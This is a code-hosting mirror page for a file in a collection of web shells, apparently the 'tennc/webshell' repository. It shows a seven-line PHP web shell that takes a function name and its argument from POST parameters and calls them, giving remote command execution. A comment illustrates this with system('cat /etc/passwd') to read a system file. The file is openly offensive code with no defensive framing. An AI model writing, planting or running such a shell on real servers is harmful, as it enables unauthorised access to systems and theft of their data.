1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/php/simple_2022_08_15.php
2022-08-15 00:46:41 +08:00

7 lines
90 B
PHP

<?php
$_=$POST['1'];
$__=$POST['2'];
// running -> system('cat /etc/passwd');
$_($__);
?>